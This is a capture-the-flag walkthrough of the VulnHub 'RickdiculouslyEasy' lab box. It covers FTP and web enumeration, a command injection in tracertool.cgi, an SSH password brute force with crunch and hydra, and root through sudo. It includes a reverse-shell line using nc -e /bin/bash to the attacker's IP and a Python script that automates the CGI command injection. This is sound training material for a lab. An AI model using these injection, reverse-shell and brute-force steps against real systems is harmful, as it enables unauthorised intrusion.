INFO

Name : RickdiculouslyEasy

Entry : 16 / 35

Level: 

VulnHub URL : https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

GOAL

As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.

SETUP

I'm using both VMware Workstation and VirtualBox (depending on the condition of the image) to host Kali and the RickdiculouslyEasy image, with both VMs on a NAT network (sometimes Bridged). I used VirtualBox this time.

DESCRIPTION

This is a fedora server vm, created with virtualbox.

It is a very simple Rick and Morty themed boot to root.

There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.

It's designed to be a beginner ctf, if you're new to pen testing, check it out!


 

TABLE OF CONTENTS

    1. DISCOVERY

    2. SCANNING

    3. WEB ENUMERATION & EXPLOITATION

    4. PRIVILEGE ESCALATION

    5. EXTRA POINTS

 


1. DISCOVERY

: netdiscover

2. SCANNING

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
ftp-anon: Anonymous FTP login allowed (FTP code 230)

22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
9090/tcp open  http    Cockpit web service 161 or earlier


┌──(root💀takudaddy)-[~]
└─# nmap -p- 192.168.10.34                               130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-01 18:34 KST
Nmap scan report for 192.168.10.34
Host is up (0.000082s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown

 

: TRACE METHODS

FTP

┌──(root💀takudaddy)-[~]
└─# ftp 192.168.10.34
Connected to 192.168.10.34.
220 (vsFTPd 3.0.3)
Name (192.168.10.34:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (42.8138 kB/s)
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/pub" is the current directory
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.

ftp> bye
221 Goodbye.
                                                                
┌──(root💀takudaddy)-[~]
└─# cat FLAG.txt      
FLAG{Whoa this is unexpected} - 10 Points

: flag 10/130

3. WEB ENUMERATION & EXPLOITATION

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

==> DIRECTORY: http://192.168.10.34/passwords/
+ http://192.168.10.34/index.html (CODE:200|SIZE:326)          
+ http://192.168.10.34/robots.txt (CODE:200|SIZE:126)  

/.htaccess            (Status: 403) [Size: 218]
/.htpasswd            (Status: 403) [Size: 218]
/cgi-bin/             (Status: 403) [Size: 217]
/passwords            (Status: 301) [Size: 239] [--> http://192.168.10.34/passwords/]
/robots.txt           (Status: 200) [Size: 126]   

: 80

: 9090

: flag 20/130

/passwords

/FLAG.txt

: flag 30/130

/passwords.html

┌──(root💀takudaddy)-[~]
└─# curl -v http://192.168.10.34/passwords/passwords.html
*   Trying 192.168.10.34:80...
* Connected to 192.168.10.34 (192.168.10.34) port 80 (#0)
> GET /passwords/passwords.html HTTP/1.1
> Host: 192.168.10.34
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 01 Apr 2021 10:45:40 GMT
< Server: Apache/2.4.27 (Fedora)
< Last-Modified: Wed, 23 Aug 2017 09:51:24 GMT
< ETag: "160-55768a7a87d2a"
< Accept-Ranges: bytes
< Content-Length: 352
< Content-Type: text/html; charset=UTF-8
< 
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
* Connection #0 to host 192.168.10.34 left intact

 

password : winter

/robots.txt

/cgi-bin/root_shell.cgi

/cgi-bin/tracertool.cgi

Shellshock? LFI?

Command injection through the ip parameter works: appending `;` and a command after the IP runs it on the target!

The cat command doesn't work on this box;;

So substitute more~

There are RickSanchez, Morty and Summer users.

Could Summer's password really be winter?

It is ;;

Let's connect via FTP or SSH.

┌──(root💀takudaddy)-[~]
└─# ftp 192.168.10.34                                                        255 ⨯
Connected to 192.168.10.34.
220 (vsFTPd 3.0.3)
Name (192.168.10.34:root): Summer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002           48 Aug 21  2017 FLAG.txt
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (48 bytes).
226 Transfer complete.
48 bytes received in 0.00 secs (41.6297 kB/s)
ftp> bye
221 Goodbye.
                                                                                   
┌──(root💀takudaddy)-[~]
└─# ls    
Desktop    Downloads  Music     Public     Videos
Documents  FLAG.txt   Pictures  Templates
                                                                                   
┌──(root💀takudaddy)-[~]
└─# cat FLAG.txt      
FLAG{Get off the high road Summer!} - 10 Points

flag 40/130

* Note: SSH is not on port 22 (the service scan could only report it as `ssh?`).

Port 22222, found in the full port scan above, turns out to be the real SSH service,

so SSH connections have to use that port.

┌──(root💀takudaddy)-[~]
└─# ssh Summer@192.168.10.34 -p 22222                                        255 ⨯
The authenticity of host '[192.168.10.34]:22222 ([192.168.10.34]:22222)' can't be established.
ECDSA key fingerprint is SHA256:rP4CX/V9xNZay9srIUBRq2BFQTnmxUO9cs1F3E9yzg0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.10.34]:22222' (ECDSA) to the list of known hosts.
Summer@192.168.10.34's password: 
Last login: Thu Apr  1 22:33:00 2021
[Summer@localhost ~]$ exit
logout
Connection to 192.168.10.34 closed.

Anyway, let's keep going.

[Summer@localhost ~]$ cd /home
[Summer@localhost home]$ ls
Morty  RickSanchez  Summer
[Summer@localhost home]$ cd Morty
[Summer@localhost Morty]$ ls -al
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15  2017 .
drwxr-xr-x. 5 root  root     52 Aug 18  2017 ..
-rw-------. 1 Morty Morty     1 Sep 15  2017 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30  2017 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30  2017 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30  2017 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22  2017 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22  2017 Safe_Password.jpg
[Summer@localhost Morty]$ cp journal.txt.zip ~
[Summer@localhost Morty]$ cp Safe_Password.jpg ~


[Summer@localhost home]$ cd RickSanchez/
[Summer@localhost RickSanchez]$ ls
RICKS_SAFE  ThisDoesntContainAnyFlags
[Summer@localhost RickSanchez]$ cd RICKS_SAFE/
[Summer@localhost RICKS_SAFE]$ ls -al
total 12
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21  2017 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21  2017 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8704 Sep 21  2017 safe
[Summer@localhost RICKS_SAFE]$ cp safe ~
[Summer@localhost RICKS_SAFE]$ cd ..
[Summer@localhost RickSanchez]$ cd ThisDoesntContainAnyFlags/
[Summer@localhost ThisDoesntContainAnyFlags]$ ls -al
total 4
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18  2017 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21  2017 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18  2017 NotAFlag.txt
[Summer@localhost ThisDoesntContainAnyFlags]$ cp NotAFlag.txt ~
[Summer@localhost ThisDoesntContainAnyFlags]$ cd /home

Found the hint files.

Copy them into Summer's home directory

and pull them over to the attacking box.

[Summer@localhost Morty]$ python -m SimpleHTTPServer 7979
Serving HTTP on 0.0.0.0 port 7979 ...


┌──(root💀takudaddy)-[/study]
└─# wget http://192.168.10.34:7979/Safe_Password.jpg
--2021-04-01 20:57:20--  http://192.168.10.34:7979/Safe_Password.jpg
Connecting to 192.168.10.34:7979... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43145 (42K) [image/jpeg]
Saving to: ‘Safe_Password.jpg’

Safe_Password.j 100%[=======>]  42.13K  --.-KB/s    in 0s      

2021-04-01 20:57:20 (948 MB/s) - ‘Safe_Password.jpg’ saved [43145/43145]

* Note *

`python -m SimpleHTTPServer` is the Python 2 module; on a Python 3 host the equivalent is `python3 -m http.server 7979`.

If spinning up a port with Python is a hassle,

scp over port 22222 is another way to pull the files.

I grabbed the remaining files that way:

┌──(root💀takudaddy)-[/study]
└─# scp -P 22222 Summer@192.168.10.34:safe .           
Summer@192.168.10.34's password: 
safe                                                          100% 8704     3.7MB/s   00:00    
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# scp -P 22222 Summer@192.168.10.34:NotAFlag.txt .
Summer@192.168.10.34's password: 
NotAFlag.txt                                                  100%   95    40.4KB/s   00:00   

Now check the files.

┌──(root💀takudaddy)-[/study]
└─# unzip journal.txt.zip 
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
password incorrect--reenter:          

Unzipping prompts for a password.

I tried winter, but it failed.

The other file is probably the hint.

Let's check it.

┌──(root💀takudaddy)-[/study]
└─# strings Safe_Password.jpg
JFIF
Exif
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
8BIM
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
        #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
0D000D\DDDD\t\\\\\t

password : Meeseek

Open it again:

┌──(root💀takudaddy)-[/study]
└─# unzip journal.txt.zip
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: journal.txt             
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# ls
45939.py  hydra.restore  journal.txt  journal.txt.zip  Safe_Password.jpg
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# cat journal.txt      
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
                                                                                                

flag 60/130

131333 looks like a password.

Check the remaining files:

┌──(root💀takudaddy)-[/study]
└─# cat NotAFlag.txt 
hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..


┌──(root💀takudaddy)-[/study]
└─# strings safe                                    
/lib64/ld-linux-x86-64.so.2
.hK}m
libmcrypt.so.4
__gmon_start__
__libc_start_main
GLIBC_2.2.5
%z       
AWAVI
AUATL
[]A\A]A^A_
rijndael-128
%d, 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
AAAAAAAAAAAAAAAA
decrypt: %304s
g       py?
;*3$"
GCC: (GNU) 7.1.1 20170622 (Red Hat 7.1.1-3)
.text
.fini
.rodata
.eh_frame_hdr
.eh
.got.plt
.data
.bss
.comment

The safe file doesn't run on Kali (most likely because it needs libmcrypt.so.4, as the strings output shows).

It looks like it can be run as the Summer user on the target, so trying there:

[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!

Right.

It says to use a command-line argument; does that mean the password?

[Summer@localhost ~]$ ./safe 131333
decrypt:        FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.

flag 80/130 for now.

The next hint is the name of Rick's band.

How would I know that -_-;;

Googling gives

Flesh Curtains

(The hints also say "sudo is wheely good", which points at the wheel group; RickSanchez does turn out to be in wheel once we switch to him.)

So one of those words has to be combined with one uppercase letter and one digit, in that order..

First, generate every combination for each word with crunch:

┌──(root💀takudaddy)-[/study]
└─# crunch 7 7 -t ,%Flesh -o flesh.pass                                                     1 ⨯
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# ls
45939.py    hydra.restore  journal.txt.zip  safe
flesh.pass  journal.txt    NotAFlag.txt     Safe_Password.jpg
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# wc -l flesh.pass                                
260 flesh.pass
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# crunch 10 10 -t ,%Curtains -o curtains.pass
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output

Concatenate the two lists into one,

then brute-force the password with hydra.

└─# cat flesh.pass curtains.pass > pass.list   
                                                                                                
                                                                                                
┌──(root💀takudaddy)-[/study]
└─# hydra -l RickSanchez -P pass.list ssh://192.168.10.34 -s 22222   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-01 21:34:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.10.34:22222/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 344 to do in 00:02h, 16 active
[STATUS] 130.00 tries/min, 260 tries in 00:02h, 264 to do in 00:03h, 16 active
[STATUS] 135.33 tries/min, 406 tries in 00:03h, 119 to do in 00:01h, 16 active
[22222][ssh] host: 192.168.10.34   login: RickSanchez   password: P7Curtains

Found it:
P7Curtains
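As an added example (not part of the original writeup), the same candidate list built in Python instead of two crunch runs: it walks the clues in the order the safe binary gives them and yields one uppercase letter, one digit, then one band-name word. The band name Flesh Curtains comes from the show, as noted above; nothing else is assumed.

```python
import itertools
import string

# Clues from the `safe` binary, in the order given: one uppercase letter,
# one digit, then one word of Rick's old band name.  The band name
# (Flesh Curtains) is show trivia, not something read from the target.
BAND_WORDS = ("Flesh", "Curtains")


def candidate_passwords(words=BAND_WORDS):
    """Yield every <UPPER><DIGIT><word> candidate: 26 * 10 * len(words) entries.

    Same key space as `crunch 7 7 -t ,%Flesh` plus `crunch 10 10 -t ,%Curtains`
    (260 lines each), without needing crunch installed.
    """
    for word in words:
        for upper, digit in itertools.product(string.ascii_uppercase, string.digits):
            yield f"{upper}{digit}{word}"


def write_wordlist(path, words=BAND_WORDS):
    """Write one candidate per line (the format hydra -P expects); return the count."""
    count = 0
    with open(path, "w", encoding="ascii") as fh:
        for pw in candidate_passwords(words):
            fh.write(pw + "\n")
            count += 1
    return count


if __name__ == "__main__":
    n = write_wordlist("pass.list")
    print(f"wrote {n} candidates to pass.list")
```

Feed pass.list to hydra exactly as above; adding `-t 4`, as hydra's own warning recommends, keeps the attack under the parallel-connection limit most sshd configurations impose.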

 

 

 

Switch user:

[Summer@localhost home]$ su RickSanchez
Password: 
[RickSanchez@localhost home]$ id
uid=1000(RickSanchez) gid=1000(RickSanchez) groups=1000(RickSanchez),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[RickSanchez@localhost home]$ 

4. PRIVILEGE ESCALATION

[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez: 
Matching Defaults entries for RickSanchez on localhost:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User RickSanchez may run the following commands on localhost:
    (ALL) ALL
[RickSanchez@localhost ~]$ sudo /bin/bash
[root@localhost RickSanchez]# 
[root@localhost RickSanchez]# cd /root
[root@localhost ~]# ls
anaconda-ks.cfg  FLAG.txt
[root@localhost ~]# cat FLAG.txt 
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[root@localhost ~]# 

sudo allows anything, so switching to root succeeds immediately.

But the flag output is a picture of a cat: cat has evidently been replaced on this box,

so use more instead of cat.

[root@localhost ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points
[root@localhost ~]# 

flag 110/130

That's the end, but there are places I haven't looked yet,

so let's poke around a bit more to collect the remaining points.

5. EXTRA POINTS

First check whether nc exists on the target, start a listener,

and test whether a reverse shell connects back.

It doesn't;

Let's try the same thing with curl:

┌──(root💀takudaddy)-[~]
└─# curl 192.168.10.34/cgi-bin/tracertool.cgi?ip=192.168.10.34;id
<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi
    method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>
<pre>
traceroute to 192.168.10.34 (192.168.10.34), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.10.34)  0.010 ms  0.003 ms  0.002 ms
</pre>
</html>
uid=0(root) gid=0(root) groups=0(root),142(kaboxer)
                                

                                                   
┌──(root💀takudaddy)-[~]
└─# curl 192.168.10.34/cgi-bin/tracertool.cgi?ip=192.168.10.34;nc -e /bin/bash 192.168.10.10 7979
<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi
    method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>
<pre>
traceroute to 192.168.10.34 (192.168.10.34), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.10.34)  0.010 ms  0.002 ms  0.002 ms
</pre>
</html>

It seemed to work, but it was connecting to my own box.

The reason is the unquoted `;` in the curl command line: the local shell ends the curl command there and runs `id` (and `nc -e /bin/bash ...`) on Kali itself. The `id` output above shows the kaboxer group, which belongs to the Kali host rather than the target, and the nc connected back to my own listener. To send the `;` to the CGI, the URL has to be quoted or the `;` percent-encoded as %3B.

Since I already have root, this is pointless anyway,

so I'll just move on.
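As an added example (not code from the original writeup), here is the injection done properly from Python: the `;` and the command are percent-encoded inside the ip parameter so they reach tracertool.cgi instead of the local shell, and the command's output is pulled out of the returned HTML. It assumes the CGI echoes the injected command's output inside the same <pre> block as the traceroute; the sample response below is constructed for the offline check, and the apache uid in it is made up.

```python
import urllib.parse
import urllib.request

TARGET = "http://192.168.10.34"       # target address from the writeup
CGI_PATH = "/cgi-bin/tracertool.cgi"  # vulnerable CGI listed in robots.txt


def build_injection_url(cmd, ip="192.168.10.34", target=TARGET):
    """Build the GET URL that appends `cmd` to the traceroute target.

    The whole ip value is percent-encoded, so ';' travels to the CGI as %3B
    instead of being consumed by the attacker's shell (an unquoted ';' on a
    curl command line ends the curl command and runs `cmd` locally).
    """
    payload = f"{ip};{cmd}"
    return f"{target}{CGI_PATH}?ip={urllib.parse.quote(payload, safe='')}"


def extract_pre(html_text):
    """Return the text inside the first <pre>...</pre> block of the CGI's page."""
    start = html_text.find("<pre>")
    if start == -1:
        return ""
    start += len("<pre>")
    end = html_text.find("</pre>", start)
    if end == -1:
        end = len(html_text)
    return html_text[start:end].strip()


def strip_traceroute(pre_text):
    """Drop the traceroute header and hop lines; keep what the injected command printed.

    Hop lines look like ' 1  host (ip)  0.010 ms ...': first token numeric, 'ms' present.
    """
    keep = []
    for line in pre_text.splitlines():
        s = line.strip()
        if s.startswith("traceroute to "):
            continue
        if s and s.split()[0].isdigit() and " ms" in s:
            continue
        keep.append(line)
    return "\n".join(keep).strip()


def run_command(cmd, timeout=10):
    """Send the injected request to the target and return only the command output.

    Needs network access to the target; on this box use `more`, not `cat`,
    because cat has been replaced with an ASCII-art cat.
    """
    with urllib.request.urlopen(build_injection_url(cmd), timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return strip_traceroute(extract_pre(body))


# Constructed sample response, modelled on the page the writeup shows, with the
# output of an injected `id` placed after the hop line (assumed CGI behaviour).
SAMPLE_RESPONSE = """<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<pre>
traceroute to 192.168.10.34 (192.168.10.34), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.10.34)  0.010 ms  0.003 ms  0.002 ms
uid=48(apache) gid=48(apache) groups=48(apache)
</pre>
</html>
"""

if __name__ == "__main__":
    print(build_injection_url("more /etc/passwd"))
    print(strip_traceroute(extract_pre(SAMPLE_RESPONSE)))
```

The same encoding from the shell is `curl -G --data-urlencode 'ip=192.168.10.34;id' http://192.168.10.34/cgi-bin/tracertool.cgi`; `-G` turns the encoded data into the query string, and the single quotes keep the `;` away from the local shell.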

 

 

 

: 13337

Connecting with nc:

┌──(root💀takudaddy)-[/study]
└─# nc 192.168.10.34 13337                                  1 ⨯
FLAG:{TheyFoundMyBackDoorMorty}-10Points

: flag 120/130

 

 

 

 

: 60000

It's a shell.

Connecting with nc, maybe something more can be done here?

┌──(root💀takudaddy)-[~]
└─# nc 192.168.10.34 60000                                 1 ⨯
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points 
# cd /home
Permission Denied. 
# ls -al
FLAG.txt 
# cd ..
Permission Denied. 

: flag 130/130